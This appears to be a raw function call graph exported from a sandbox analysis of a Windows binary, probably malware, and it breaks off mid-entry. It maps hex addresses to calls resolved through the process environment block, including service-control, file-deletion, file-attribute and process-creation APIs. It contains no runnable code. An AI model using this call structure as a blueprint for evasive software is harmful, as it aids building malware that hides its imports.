4022->4025 4518 1cba25 4022->4518 4521 1d0c7c 4022->4521 4023->3884 4025->4022 4034 1dcd1c 4026->4034 4028 1c4bb4 RtlAllocateHeap GetPEB 4028->4034 4029 1d1bed GetPEB 4029->4034 4030 1dade9 GetPEB 4030->4034 4031 1dcfb1 4031->3884 4032 1d66c2 2 API calls 4032->4034 4034->4028 4034->4029 4034->4030 4034->4031 4034->4032 4036 1cb9d7 GetPEB 4034->4036 4559 1c3f09 4034->4559 4563 1e1cad 4034->4563 4567 1c3152 4034->4567 4036->4034 4045 1c1b3f 4037->4045 4039 1c225e 4039->3884 4040 1cb184 GetPEB 4040->4045 4045->4039 4045->4040 4046 1c6a8d GetPEB 4045->4046 4571 1ca01c 4045->4571 4588 1e27df 4045->4588 4598 1d95a8 4045->4598 4615 1d9184 4045->4615 4624 1d47d2 4045->4624 4046->4045 4049 1dec4b 4047->4049 4050 1dec91 4049->4050 4051 1deaa3 2 API calls 4049->4051 4767 1e03f2 4049->4767 4050->3884 4051->4049 4054 1ddd12 4052->4054 4053 1cf2b9 GetPEB 4053->4054 4054->4053 4055 1ddd3a 4054->4055 4055->3884 4057 1c4cb9 GetPEB 4056->4057 4058 1db37d 4057->4058 4058->3884 4060 1dbb13 4059->4060 4066 1deaa3 2 API calls 4060->4066 4067 1dbf0f 4060->4067 4800 1cbb23 4060->4800 4807 1e086f 4060->4807 4819 1df24c 4060->4819 4840 1c2279 4060->4840 4858 1cced8 4060->4858 4866 1e13fd 4060->4866 4874 1d692b 4060->4874 4066->4060 4067->3884 4071 1c588d GetPEB 4070->4071 4072 1c313a 4071->4072 5007 1dda13 4072->5007 4084 1dc3a6 4075->4084 4076 1c6a8d GetPEB 4076->4084 4079 1dc514 4079->3884 4080 1dc516 5027 1cf9a7 4080->5027 4084->4076 4084->4079 4084->4080 5011 1d5cb1 4084->5011 5015 1d0097 4084->5015 5020 1cf605 4084->5020 5024 1ce2b2 4084->5024 4088 1c5aa2 4085->4088 4087 1c5b7d 4087->3884 4088->4087 5031 1d5c05 4088->5031 5035 1ce0eb 4088->5035 4091 1cc7eb 4090->4091 4092 1d66c2 2 API calls 4091->4092 4093 1cce91 4091->4093 4095 1cc453 GetPEB 4091->4095 4096 1c4bb4 RtlAllocateHeap GetPEB 4091->4096 4097 1cce8f 4091->4097 4098 1cb9d7 GetPEB 4091->4098 4099 1d1bed GetPEB 4091->4099 4092->4091 4094 1d63f0 3 API calls 4093->4094 4094->4097 4095->4091 4096->4091 4097->3878 4098->4091 4099->4091 4102 1c8fba 4100->4102 4101 1c4bb4 2 API calls 4101->4102 4102->4101 4104 1d734a GetPEB 4102->4104 4106 1c90e2 4102->4106 4107 1cb9d7 GetPEB 4102->4107 4109 1e110e 2 API calls 4102->4109 4110 1cb4fc 4 API calls 4102->4110 4112 1c90e0 4102->4112 5039 1cd899 4102->5039 5046 1c9133 4102->5046 4104->4102 4108 1cffde GetPEB 4106->4108 4107->4102 4111 1c90fb 4108->4111 4109->4102 4110->4102 5055 1cf6cf 4111->5055 4112->3878 4115 1da9a1 4114->4115 4141 1dbff0 4115->4141 4119 1d66e9 4118->4119 4120 1dbff0 GetPEB 4119->4120 4121 1d676b SHGetFolderPathW 4120->4121 4121->3895 4123 1c32cd 4122->4123 4124 1dbff0 GetPEB 4123->4124 4125 1c337c OpenSCManagerW 4124->4125 4125->3895 4128 1c4fae 4126->4128 4130 1c9574 GetPEB 4128->4130 4131 1c5080 4128->4131 4171 1dade9 4128->4171 4175 1e07bb 4128->4175 4130->4128 4131->3895 4179 1c645e 4132->4179 4136 1deb9a 4136->3895 4138 1c958e 4137->4138 4186 1c9aac 4138->4186 4142 1dc0a6 4141->4142 4143 1daa46 CloseServiceHandle 4141->4143 4147 1e1ae9 4142->4147 4143->3895 4145 1dc0ba 4150 1db558 4145->4150 4154 1daa52 GetPEB 4147->4154 4149 1e1b98 4149->4145 4151 1db575 4150->4151 4153 1db64f 4151->4153 4155 1db384 4151->4155 4153->4143 4154->4149 4156 1db4de 4155->4156 4163 1de545 4156->4163 4159 1db520 4161 1db54f 4159->4161 4162 1db558 GetPEB 4159->4162 4161->4153 4162->4161 4164 1de558 4163->4164 4165 1dbff0 GetPEB 4164->4165 4166 1db506 4165->4166 4166->4159 4167 1de9a4 4166->4167 4168 1de9b4 4167->4168 4169 1dbff0 GetPEB 4168->4169 4170 1dea43 4169->4170 4170->4159 4172 1dae00 4171->4172 4173 1dbff0 GetPEB 4172->4173 4174 1daea1 4173->4174 4174->4128 4176 1e07d1 4175->4176 4177 1dbff0 GetPEB 4176->4177 4178 1e0861 4177->4178 4178->4128 4180 1dbff0 GetPEB 4179->4180 4181 1c64fc 4180->4181 4182 1d1b22 4181->4182 4183 1d1b41 4182->4183 4184 1dbff0 GetPEB 4183->4184 4185 1d1bdd RtlAllocateHeap 4184->4185 4185->4136 4187 1c9ace 4186->4187 4188 1dbff0 GetPEB 4187->4188 4189 1c9601 4188->4189 4189->3899 4191 1c4bce 4190->4191 4192 1deaa3 2 API calls 4191->4192 4193 1c4c3e 4192->4193 4193->3913 4193->4193 4195 1cd6aa 4194->4195 4196 1dbff0 GetPEB 4195->4196 4197 1cd746 4196->4197 4197->3913 4199 1cc728 4198->4199 4200 1dbff0 GetPEB 4199->4200 4201 1cc7bd 4200->4201 4201->3913 4203 1cd5e4 4202->4203 4204 1dbff0 GetPEB 4203->4204 4205 1cd67d 4204->4205 4205->3909 4207 1cb9e9 4206->4207 4208 1c6a8d GetPEB 4207->4208 4209 1cba1e 4208->4209 4209->3913 4211 1c6a9d 4210->4211 4212 1c645e GetPEB 4211->4212 4213 1c6bbb 4212->4213 4216 1d50b6 4213->4216 4217 1d50d5 4216->4217 4218 1dbff0 GetPEB 4217->4218 4219 1c6bd4 4218->4219 4219->3911 4221 1cc507 4220->4221 4222 1dbff0 GetPEB 4221->4222 4223 1cc5b2 OpenServiceW 4222->4223 4223->3919 4225 1d1089 4224->4225 4226 1dbff0 GetPEB 4225->4226 4227 1d1122 4226->4227 4227->3919 4229 1cd35d 4228->4229 4230 1c4bb4 2 API calls 4229->4230 4231 1cd4ea 4230->4231 4256 1cfd5f 4231->4256 4234 1cb9d7 GetPEB 4235 1cd516 4234->4235 4260 1c9ea8 4235->4260 4237 1cd52a 4237->3929 4239 1e1128 4238->4239 4267 1cb184 4239->4267 4242 1cb184 GetPEB 4243 1e1378 4242->4243 4244 1cb184 GetPEB 4243->4244 4245 1e138d 4244->4245 4246 1e07bb GetPEB 4245->4246 4247 1e13a2 4246->4247 4248 1e07bb GetPEB 4247->4248 4249 1e13ba 4248->4249 4271 1c338b 4249->4271 4251 1e13f0 4251->3925 4253 1d736f 4252->4253 4254 1cf56b GetPEB 4253->4254 4255 1d738c 4254->4255 4255->3925 4257 1cfd7b 4256->4257 4264 1cf56b 4257->4264 4261 1c9ebe 4260->4261 4262 1dbff0 GetPEB 4261->4262 4263 1c9f4d DeleteFileW 4262->4263 4263->4237 4265 1dbff0 GetPEB 4264->4265 4266 1cd507 4265->4266 4266->4234 4268 1cb19a 4267->4268 4275 1dc0df 4268->4275 4272 1c339b 4271->4272 4273 1dbff0 GetPEB 4272->4273 4274 1c3449 SHFileOperationW 4273->4274 4274->4251 4276 1dc0fa 4275->4276 4279 1de0ca 4276->4279 4280 1de0e7 4279->4280 4281 1dbff0 GetPEB 4280->4281 4282 1cb1f9 4281->4282 4282->4242 4284 1dbff0 GetPEB 4283->4284 4285 1c5939 4284->4285 4285->3937 4287 1dbff0 GetPEB 4286->4287 4288 1cf361 4287->4288 4288->3937 4290 1d1c12 4289->4290 4291 1cf56b GetPEB 4290->4291 4292 1d1c34 4291->4292 4292->3937 4294 1cf1fa 4293->4294 4295 1dbff0 GetPEB 4294->4295 4296 1cf2a8 SetFileInformationByHandle 4295->4296 4296->3951 4298 1dbf49 4297->4298 4299 1dbff0 GetPEB 4298->4299 4300 1dbfd6 CreateFileW 4299->4300 4300->3951 4302 1d190a 4301->4302 4303 1dbff0 GetPEB 4302->4303 4304 1d1999 4303->4304 4304->3951 4306 1de389 4305->4306 4307 1dbff0 GetPEB 4306->4307 4308 1de42b CloseHandle 4307->4308 4308->3948 4310 1dba53 4309->4310 4311 1dbff0 GetPEB 4310->4311 4312 1dbae0 4311->4312 4312->3956 4321 1c3537 4313->4321 4314 1c3c34 4316 1c6a8d GetPEB 4314->4316 4315 1deaa3 RtlAllocateHeap GetPEB 4315->4321 4317 1c3c45 4316->4317 4317->3963 4318 1c6a8d GetPEB 4318->4321 4321->4314 4321->4315 4321->4317 4321->4318 4322 1da98e 2 API calls 4321->4322 4323 1cc4eb 2 API calls 4321->4323 4325 1cf2b9 GetPEB 4321->4325 4330 1db14e 4321->4330 4334 1d13d4 4321->4334 4338 1da3e6 4321->4338 4322->4321 4323->4321 4325->4321 4327 1c411c 4326->4327 4328 1dbff0 GetPEB 4327->4328 4329 1c419f 4328->4329 4329->3963 4331 1db16a 4330->4331 4332 1dbff0 GetPEB 4331->4332 4333 1db205 4332->4333 4333->4321 4335 1d140f 4334->4335 4336 1dbff0 GetPEB 4335->4336 4337 1d14bb 4336->4337 4337->4321 4339 1da415 4338->4339 4340 1dbff0 GetPEB 4339->4340 4341 1da4a0 4340->4341 4341->4321 4343 1c4640 4342->4343 4346 1d1d1c 4343->4346 4347 1d1d3a 4346->4347 4350 1c2fe6 4347->4350 4351 1c3002 4350->4351 4352 1dbff0 GetPEB 4351->4352 4353 1c30ae 4352->4353 4353->3981 4355 1cfff1 4354->4355 4356 1dbff0 GetPEB 4355->4356 4357 1d008b 4356->4357 4357->4000 4368 1d5d94 4358->4368 4359 1d63d3 4378 1c428c 4359->4378 4361 1d63d1 4361->4000 4362 1c4bb4 RtlAllocateHeap GetPEB 4362->4368 4365 1d734a GetPEB 4365->4368 4366 1cfd5f GetPEB 4366->4368 4367 1d5d68 2 API calls 4367->4368 4368->4359 4368->4361 4368->4362 4368->4365 4368->4366 4368->4367 4369 1cb9d7 GetPEB 4368->4369 4370 1cfa6c 4368->4370 4374 1cfe4b 4368->4374 4369->4368 4371 1cfa85 4370->4371 4372 1dbff0 GetPEB 4371->4372 4373 1cfb15 4372->4373 4373->4368 4375 1cfe5e 4374->4375 4376 1dbff0 GetPEB 4375->4376 4377 1cfef3 4376->4377 4377->4368 4379 1c42a5 4378->4379 4380 1dbff0 GetPEB 4379->4380 4381 1c4337 4380->4381 4381->4361 4383 1cc635 4382->4383 4385 1cc61f 4382->4385 4383->4005 4384 1c6a8d GetPEB 4384->4385 4385->4383 4385->4384 4387 1d5047 4386->4387 4400 1d0b4c 4387->4400 4395 1e252f 4390->4395 4391 1c4bb4 2 API calls 4391->4395 4392 1e2704 4392->4005 4393 1e26f3 4394 1c6a8d GetPEB 4393->4394 4394->4392 4395->4391 4395->4392 4395->4393 4397 1deaa3 2 API calls 4395->4397 4398 1cb9d7 GetPEB 4395->4398 4502 1dacff 4395->4502 4506 1cc453 4395->4506 4397->4395 4398->4395 4406 1d0b68 4400->4406 4402 1d0c59 4404 1c6a8d GetPEB 4402->4404 4405 1d0c57 4404->4405 4405->4005 4406->4402 4406->4405 4407 1deaa3 2 API calls 4406->4407 4409 1c7786 4406->4409 4426 1c508b 4406->4426 4435 1c3210 4406->4435 4407->4406 4425 1c842c 4409->4425 4410 1c88b0 4411 1cd5cb GetPEB 4410->4411 4414 1c88ae 4411->4414 4413 1cf36a GetPEB 4413->4425 4414->4406 4417 1c4bb4 RtlAllocateHeap GetPEB 4417->4425 4422 1d1d1c GetPEB 4422->4425 4423 1cd68b GetPEB 4423->4425 4424 1cb9d7 GetPEB 4424->4425 4425->4410 4425->4413 4425->4414 4425->4417 4425->4422 4425->4423 4425->4424 4440 1c9f58 4425->4440 4444 1cbd30 4425->4444 4448 1cb40a 4425->4448 4452 1cfd9d 4425->4452 4456 1d7473 4425->4456 4482 1c4d7d 4425->4482 4486 1d677f 4425->4486 4427 1c55c3 4426->4427 4428 1c575d 4427->4428 4430 1c4bb4 RtlAllocateHeap GetPEB 4427->4430 4431 1c575b 4427->4431 4432 1cb40a GetPEB 4427->4432 4433 1cd68b GetPEB 4427->4433 4434 1cb9d7 GetPEB 4427->4434 4429 1cd5cb GetPEB 4428->4429 4429->4431 4430->4427 4431->4406 4432->4427 4433->4427 4434->4427 4436 1d677f GetPEB 4435->4436 4437 1c329c 4436->4437 4438 1c6a8d GetPEB 4437->4438 4439 1c32af 4438->4439 4439->4406 4441 1c9f7a 4440->4441 4442 1dbff0 GetPEB 4441->4442 4443 1ca009 4442->4443 4443->4425 4445 1cbd52 4444->4445 4446 1dbff0 GetPEB 4445->4446 4447 1cbdf5 4446->4447 4447->4425 4449 1cb43a 4448->4449 4450 1dbff0 GetPEB 4449->4450 4451 1cb4e0 4450->4451 4451->4425 4453 1cfdb3 4452->4453 4454 1dbff0 GetPEB 4453->4454 4455 1cfe3d 4454->4455 4455->4425 4457 1d8307 4456->4457 4458 1cd5cb GetPEB 4457->4458 4459 1d8558 4457->4459 4460 1c6a8d GetPEB 4457->4460 4461 1d87d6 4457->4461 4462 1deaa3 2 API calls 4457->4462 4468 1c4bb4 RtlAllocateHeap GetPEB 4457->4468 4469 1cb9d7 GetPEB 4457->4469 4479 1d86af 4457->4479 4490 1c8ab6 4457->4490 4494 1c65d5 4457->4494 4458->4457 4463 1c4bb4 2 API calls 4459->4463 4460->4457 4461->4425 4462->4457 4466 1d8578 4463->4466 4465 1c4bb4 RtlAllocateHeap GetPEB 4465->4479 4467 1c4bb4 2 API calls 4466->4467 4471 1d859a 4467->4471 4468->4457 4469->4457 4470 1cd68b GetPEB 4470->4479 4472 1dade9 GetPEB 4471->4472 4475 1d85c6 4472->4475 4474 1cb9d7 GetPEB 4474->4479 4498 1dcfc3 4475->4498 4478 1cb9d7 GetPEB 4480 1d8697 4478->4480 4479->4465 4479->4470 4479->4474 4481 1cb9d7 GetPEB 4480->4481 4481->4479 4483 1c4dad 4482->4483 4484 1dbff0 GetPEB 4483->4484 4485 1c4e5c 4484->4485 4485->4425 4487 1d6792 4486->4487 4488 1dbff0 GetPEB 4487->4488 4489 1d6834 4488->4489 4489->4425 4491 1c8af6 4490->4491 4492 1dbff0 GetPEB 4491->4492 4493 1c8baa 4492->4493 4493->4457 4495 1c6602 4494->4495 4496 1dbff0 GetPEB 4495->4496 4497 1c6697 4496->4497 4497->4457 4499 1dcff4 4498->4499 4500 1dbff0 GetPEB 4499->4500 4501 1d8667 4500->4501 4501->4478 4503 1dad1f 4502->4503 4504 1deaa3 2 API calls 4503->4504 4505 1dad9c 4504->4505 4505->4395 4507 1cc481 4506->4507 4508 1cf56b GetPEB 4507->4508 4509 1cc4a8 4508->4509 4509->4395 4511 1e0343 4510->4511 4512 1dbff0 GetPEB 4511->4512 4513 1e03e4 4512->4513 4513->4013 4515 1daa83 4514->4515 4516 1dbff0 GetPEB 4515->4516 4517 1dab22 4516->4517 4517->4013 4529 1d3cdd 4518->4529 4522 1d0c9d 4521->4522 4552 1cf43b 4522->4552 4527 1de373 2 API calls 4528 1d0e00 4527->4528 4528->4022 4532 1d3d02 4529->4532 4535 1cba93 4532->4535 4536 1d3f17 4532->4536 4538 1c5942 4532->4538 4541 1d1a72 4532->4541 4545 1defa0 4532->4545 4549 1cb34c 4532->4549 4535->4022 4537 1de373 2 API calls 4536->4537 4537->4535 4539 1c588d GetPEB 4538->4539 4540 1c597a 4539->4540 4540->4532 4542 1d1a88 4541->4542 4543 1dbff0 GetPEB 4542->4543 4544 1d1b14 4543->4544 4544->4532 4546 1defb9 4545->4546 4547 1dbff0 GetPEB 4546->4547 4548 1df052 4547->4548 4548->4532 4550 1dbff0 GetPEB 4549->4550 4551 1cb3f2 4550->4551 4551->4532 4553 1dbff0 GetPEB 4552->4553 4554 1cf4f2 4553->4554 4554->4528 4555 1d14da 4554->4555 4556 1d14f9 4555->4556 4557 1dbff0 GetPEB 4556->4557 4558 1d0dee 4557->4558 4558->4527 4560 1c3f42 4559->4560 4561 1dbff0 GetPEB 4560->4561 4562 1c3ff1 4561->4562 4562->4034 4564 1e1cd8 4563->4564 4565 1dbff0 GetPEB 4564->4565 4566 1e1d53 4565->4566 4566->4034 4568 1c3169 4567->4568 4569 1dbff0 GetPEB 4568->4569 4570 1c3203 4569->4570 4570->4034 4587 1ca07f 4571->4587 4573 1d5b4c GetPEB 4573->4587 4574 1cb074 4668 1d5b4c 4574->4668 4577 1c4bb4 2 API calls 4577->4587 4578 1cb08a 4578->4045 4583 1c6a8d GetPEB 4583->4587 4584 1cb9d7 GetPEB 4584->4587 4585 1de29a GetPEB 4585->4587 4587->4573 4587->4574 4587->4577 4587->4578 4587->4583 4587->4584 4587->4585 4636 1d41cf 4587->4636 4645 1c5797 4587->4645 4649 1c5b8a 4587->4649 4652 1c6505 4587->4652 4656 1c400f 4587->4656 4660 1daeae 4587->4660 4664 1db215 4587->4664 4596 1e2a55 4588->4596 4590 1e2bb0 4592 1c6a8d GetPEB 4590->4592 4591 1deaa3 2 API calls 4591->4596 4593 1e2bae 4592->4593 4593->4045 4594 1c4bb4 2 API calls 4594->4596 4595 1cf56b GetPEB 4595->4596 4596->4590 4596->4591 4596->4593 4596->4594 4596->4595 4597 1cb9d7 GetPEB 4596->4597 4680 1d51e8 4596->4680 4597->4596 4613 1d9fc8 4598->4613 4599 1c6a8d GetPEB 4599->4613 4600 1da353 4601 1de18b 2 API calls 4600->4601 4604 1da379 4601->4604 4602 1deaa3 RtlAllocateHeap GetPEB 4602->4613 4603 1d1d1c GetPEB 4603->4613 4699 1cc4b0 4604->4699 4606 1da34e 4606->4045 4608 1c4bb4 2 API calls 4608->4613 4611 1cb9d7 GetPEB 4611->4606 4612 1cf56b GetPEB 4612->4613 4613->4599 4613->4600 4613->4602 4613->4603 4613->4606 4613->4608 4613->4612 4614 1cb9d7 GetPEB 4613->4614 4691 1de18b 4613->4691 4695 1d9556 4613->4695 4614->4613 4622 1d91ae 4615->4622 4617 1d9537 4618 1c6a8d GetPEB 4617->4618 4619 1d9535 4618->4619 4619->4045 4621 1deaa3 2 API calls 4621->4622 4622->4617 4622->4619 4622->4621 4623 1d1d1c GetPEB 4622->4623 4703 1d16ad 4622->4703 4709 1c9617 4622->4709 4623->4622 4635 1d47fd 4624->4635 4625 1d500a 4629 1c6a8d GetPEB 4625->4629 4632 1d501e 4629->4632 4630 1c6a8d GetPEB 4630->4635 4631 1ce379 2 API calls 4631->4635 4632->4045 4633 1d1d1c GetPEB 4633->4635 4634 1deaa3 2 API calls 4634->4635 4635->4625 4635->4630 4635->4631 4635->4632 4635->4633 4635->4634 4751 1c4342 4635->4751 4756 1da4b5 4635->4756 4763 1c8bcb 4635->4763 4637 1d4420 4636->4637 4638 1d4518 4637->4638 4642 1deaa3 RtlAllocateHeap GetPEB 4637->4642 4643 1d1d1c GetPEB 4637->4643 4644 1c6a8d GetPEB 4637->4644 4672 1c7209 4637->4672 4640 1d4520 4638->4640 4641 1c6a8d GetPEB 4638->4641 4640->4587 4641->4640 4642->4637 4643->4637 4644->4637 4646 1c57d2 4645->4646 4647 1dbff0 GetPEB 4646->4647 4648 1c5872 4647->4648 4648->4587 4676 1e1933 4649->4676 4653 1c652a 4652->4653 4654 1dbff0 GetPEB 4653->4654 4655 1c65c3 4654->4655 4655->4587 4657 1c4036 4656->4657 4658 1dbff0 GetPEB 4657->4658 4659 1c40bd 4658->4659 4659->4587 4661 1daedf 4660->4661 4662 1dbff0 GetPEB 4661->4662 4663 1daf74 4662->4663 4663->4587 4665 1db237 4664->4665 4666 1dbff0 GetPEB 4665->4666 4667 1db2e9 4666->4667 4667->4587 4669 1d5b62 4668->4669 4670 1dbff0 GetPEB 4669->4670 4671 1d5bfa 4670->4671 4671->4578 4673 1c722b 4672->4673 4674 1dbff0 GetPEB 4673->4674 4675 1c72b9 4674->4675 4675->4637 4677 1e1957 4676->4677 4678 1dbff0 GetPEB 4677->4678 4679 1c5c87 4678->4679 4679->4587 4684 1d51fe 4680->4684 4681 1d545d 4683 1cc63a GetPEB 4681->4683 4682 1d545b 4682->4596 4683->4682 4684->4681 4684->4682 4686 1deaa3 2 API calls 4684->4686 4687 1cc63a 4684->4687 4686->4684 4688 1cc662 4687->4688 4689 1dbff0 GetPEB 4688->4689 4690 1cc6f0 4689->4690 4690->4684 4692 1de1a5 4691->4692 4693 1deaa3 2 API calls 4692->4693 4694 1de230 4693->4694 4694->4613 4696 1d957e 4695->4696 4697 1cf56b GetPEB 4696->4697 4698 1d95a0 4697->4698 4698->4613 4700 1cc4c9 4699->4700 4701 1cf56b GetPEB 4700->4701 4702 1cc4e3 4701->4702 4702->4611 4705 1d16c7 4703->4705 4704 1d18a9 4731 1d595c 4704->4731 4705->4704 4706 1d18a7 4705->4706 4716 1ce379 4705->4716 4706->4622 4711 1c9644 4709->4711 4710 1deaa3 2 API calls 4710->4711 4711->4710 4712 1d12ef GetPEB 4711->4712 4713 1c9985 4711->4713 4714 1c9996 4711->4714 4712->4711 4715 1c6a8d GetPEB 4713->4715 4714->4622 4715->4714 4729 1ce3b8 4716->4729 4717 1cf19d 4718 1cd5cb GetPEB 4717->4718 4723 1cf19b 4718->4723 4719 1c4bb4 RtlAllocateHeap GetPEB 4719->4729 4721 1deaa3 2 API calls 4721->4729 4723->4705 4724 1c65d5 GetPEB 4724->4729 4726 1c6a8d GetPEB 4726->4729 4728 1cd68b GetPEB 4728->4729 4729->4717 4729->4719 4729->4721 4729->4723 4729->4724 4729->4726 4729->4728 4730 1cb9d7 GetPEB 4729->4730 4735 1c41c6 4729->4735 4739 1cb8f4 4729->4739 4743 1cfb23 4729->4743 4747 1dac2c 4729->4747 4730->4729 4732 1d5988 4731->4732 4733 1dbff0 GetPEB 4732->4733 4734 1d5a2b 4733->4734 4734->4706 4736 1c41eb 4735->4736 4737 1dbff0 GetPEB 4736->4737 4738 1c4279 4737->4738 4738->4729 4740 1cb919 4739->4740 4741 1dbff0 GetPEB 4740->4741 4742 1cb9c4 4741->4742 4742->4729 4744 1cfb3c 4743->4744 4745 1dbff0 GetPEB 4744->4745 4746 1cfbed 4745->4746 4746->4729 4748 1dac56 4747->4748 4749 1dbff0 GetPEB 4748->4749 4750 1dace2 4749->4750 4750->4729 4753 1c4361 4751->4753 4752 1c4627 GetPEB 4752->4753 4753->4752 4754 1c45f4 4753->4754 4755 1deaa3 2 API calls 4753->4755 4754->4635 4755->4753 4758 1da4e1 4756->4758 4757 1de436 GetPEB 4757->4758 4758->4757 4759 1deaa3 2 API calls 4758->4759 4760 1da861 4758->4760 4762 1da872 4758->4762 4759->4758 4761 1c6a8d GetPEB 4760->4761 4761->4762 4762->4635 4764 1c8bde 4763->4764 4765 1d1d1c GetPEB 4764->4765 4766 1c8c72 4765->4766 4766->4635 4769 1e041a 4767->4769 4770 1e0738 4769->4770 4771 1e06d7 4769->4771 4788 1c6bfa 4769->4788 4770->4049 4772 1de18b 2 API calls 4771->4772 4773 1e06f1 4772->4773 4779 1d112d 4773->4779 4778 1cb9d7 GetPEB 4778->4770 4792 1c4b09 4779->4792 4781 1d12e4 4784 1def56 4781->4784 4785 1def7b 4784->4785 4786 1cf56b GetPEB 4785->4786 4787 1def98 4786->4787 4787->4778 4789 1c6c16 4788->4789 4790 1dbff0 GetPEB 4789->4790 4791 1c6cad 4790->4791 4791->4769 4793 1c4b23 4792->4793 4794 1dbff0 GetPEB 4793->4794 4795 1c4ba7 4794->4795 4795->4781 4796 1d683f 4795->4796 4797 1d6871 4796->4797 4798 1dbff0 GetPEB 4797->4798 4799 1d6911 4798->4799 4799->4781 4804 1cbcba 4800->4804 4801 1cbd24 4801->4060 4802 1c4cb9 GetPEB 4802->4804 4803 1c6a8d GetPEB 4803->4804 4804->4801 4804->4802 4804->4803 4806 1de373 2 API calls 4804->4806 4894 1d0f7a 4804->4894 4806->4804 4813 1e0d01 4807->4813 4808 1e0d19 4902 1d63f0 4808->4902 4809 1c9574 GetPEB 4809->4813 4811 1e0d42 4811->4060 4812 1cffde GetPEB 4812->4813 4813->4808 4813->4809 4813->4811 4813->4812 4815 1c4bb4 2 API calls 4813->4815 4816 1d734a GetPEB 4813->4816 4817 1cb9d7 GetPEB 4813->4817 4912 1cb200 4813->4912 4916 1c9b80 4813->4916 4815->4813 4816->4813 4817->4813 4931 1de034 4819->4931 4821 1d63f0 3 API calls 4837 1dfedc 4821->4837 4822 1d66c2 2 API calls 4822->4837 4823 1e02ff 4826 1de373 2 API calls 4823->4826 4824 1dade9 GetPEB 4824->4837 4825 1d51e8 2 API calls 4825->4837 4828 1e02fd 4826->4828 4828->4060 4830 1c9574 GetPEB 4830->4837 4831 1d1bed GetPEB 4831->4837 4832 1c6a8d GetPEB 4832->4837 4833 1cffde GetPEB 4833->4837 4834 1cb200 GetPEB 4834->4837 4835 1c4bb4 RtlAllocateHeap GetPEB 4835->4837 4836 1d734a GetPEB 4836->4837 4837->4821 4837->4822 4837->4823 4837->4824 4837->4825 4837->4828 4837->4830 4837->4831 4837->4832 4837->4833 4837->4834 4837->4835 4837->4836 4838 1cb9d7 GetPEB 4837->4838 4839 1c9b80 3 API calls 4837->4839 4934 1cf784 4837->4934 4940 1cd7a6 4837->4940 4838->4837 4839->4837 4857 1c2bc8 4840->4857 4841 1d63f0 3 API calls 4841->4857 4844 1c9574 GetPEB 4844->4857 4845 1c30be GetPEB 4845->4857 4847 1cffde GetPEB 4847->4857 4848 1c2c16 4850 1de373 2 API calls 4848->4850 4849 1de373 GetPEB CloseHandle 4849->4857 4851 1c2c31 4850->4851 4851->4060 4852 1cb200 GetPEB 4852->4857 4853 1c4bb4 2 API calls 4853->4857 4854 1d734a GetPEB 4854->4857 4855 1cb9d7 GetPEB 4855->4857 4856 1c9b80 3 API calls 4856->4857 4857->4841 4857->4844 4857->4845 4857->4847 4857->4848 4857->4849 4857->4851 4857->4852 4857->4853 4857->4854 4857->4855 4857->4856 4944 1e0e6d 4857->4944 4952 1cfbf8 4857->4952 4955 1cdb59 4857->4955 4864 1cd206 4858->4864 4859 1daa59 GetPEB 4859->4864 4860 1cd24f 4860->4060 4861 1cd23b 4863 1d0f7a GetPEB 4861->4863 4863->4860 4864->4859 4864->4860 4864->4861 4986 1c3c51 4864->4986 4994 1d0e0b 4864->4994 4872 1e1738 4866->4872 4867 1daa59 GetPEB 4867->4872 4868 1e1781 4868->4060 4869 1e176d 4871 1d0f7a GetPEB 4869->4871 4870 1c3c51 GetPEB 4870->4872 4871->4868 4872->4867 4872->4868 4872->4869 4872->4870 4873 1d0e0b GetPEB 4872->4873 4873->4872 4875 1d710c 4874->4875 4876 1c9574 GetPEB 4875->4876 4877 1d7210 4875->4877 4878 1d7128 4875->4878 4880 1cffde GetPEB 4875->4880 4883 1cb200 GetPEB 4875->4883 4886 1c4bb4 2 API calls 4875->4886 4889 1d734a GetPEB 4875->4889 4892 1cb9d7 GetPEB 4875->4892 4893 1c9b80 3 API calls 4875->4893 4876->4875 4877->4060 4877->4877 4879 1d66c2 2 API calls 4878->4879 4881 1d715b 4879->4881 4880->4875 4882 1c4bb4 2 API calls 4881->4882 4884 1d717e 4882->4884 4883->4875 4885 1d734a GetPEB 4884->4885 4887 1d71be 4885->4887 4886->4875 4888 1cb9d7 GetPEB 4887->4888 4890 1d71d6 4888->4890 4889->4875 4891 1d63f0 3 API calls 4890->4891 4891->4877 4892->4875 4893->4875 4895 1d0f8d 4894->4895 4898 1e1bd6 4895->4898 4899 1e1bf5 4898->4899 4900 1dbff0 GetPEB 4899->4900 4901 1d1069 4900->4901 4901->4804 4903 1d641e 4902->4903 4904 1cb184 GetPEB 4903->4904 4905 1d663b 4904->4905 4923 1d46e0 4905->4923 4907 1d6683 4907->4811 4908 1d6676 4908->4907 4909 1de373 2 API calls 4908->4909 4910 1d66a3 4909->4910 4911 1de373 2 API calls 4910->4911 4911->4907 4913 1cb219 4912->4913 4914 1cf2b9 GetPEB 4913->4914 4915 1cb2e7 4914->4915 4915->4813 4917 1c9b9f 4916->4917 4919 1c9e5e 4917->4919 4920 1dbf1c 2 API calls 4917->4920 4922 1c9e5c 4917->4922 4927 1d454e 4917->4927 4921 1de373 2 API calls 4919->4921 4920->4917 4921->4922 4922->4813 4924 1d471e 4923->4924 4925 1dbff0 GetPEB 4924->4925 4926 1d47b3 CreateProcessW 4925->4926 4926->4908 4928 1d4575 4927->4928 4929 1dbff0 GetPEB 4928->4929 4930 1d4615 4929->4930 4930->4917 4932 1dbff0 GetPEB 4931->4932 4933 1de0c1 4932->4933 4933->4837 4937 1cf7a0 4934->4937 4935 1cf985 4938 1c4627 GetPEB 4935->4938 4936 1cf983 4936->4837 4937->4935 4937->4936 4939 1deaa3 2 API calls 4937->4939 4938->4936 4939->4937 4941 1cd7d6 4940->4941 4942 1dbff0 GetPEB 4941->4942 4943 1cd87c 4942->4943 4943->4837 4945 1e0e92 4944->4945 4947 1cfbf8 GetPEB 4945->4947 4948 1e1061 4945->4948 4951 1e1076 4945->4951 4966 1dd0a1 4945->4966 4970 1c2f1a 4945->4970 4947->4945 4950 1de373 2 API calls 4948->4950 4950->4951 4951->4857 4953 1dbff0 GetPEB 4952->4953 4954 1cfcac 4953->4954 4954->4857 4964 1cdb99 4955->4964 4957 1cb184 GetPEB 4957->4964 4958 1cdf48 4974 1e1d6d 4958->4974 4959 1c4bb4 2 API calls 4959->4964 4961 1ce07b 4961->4961 4964->4957 4964->4958 4964->4959 4964->4961 4965 1cb9d7 GetPEB 4964->4965 4978 1d5a47 4964->4978 4982 1de8e7 4964->4982 4965->4964 4967 1dd0bd 4966->4967 4968 1dbff0 GetPEB 4967->4968 4969 1dd13e 4968->4969 4969->4945 4971 1c2f3e 4970->4971 4972 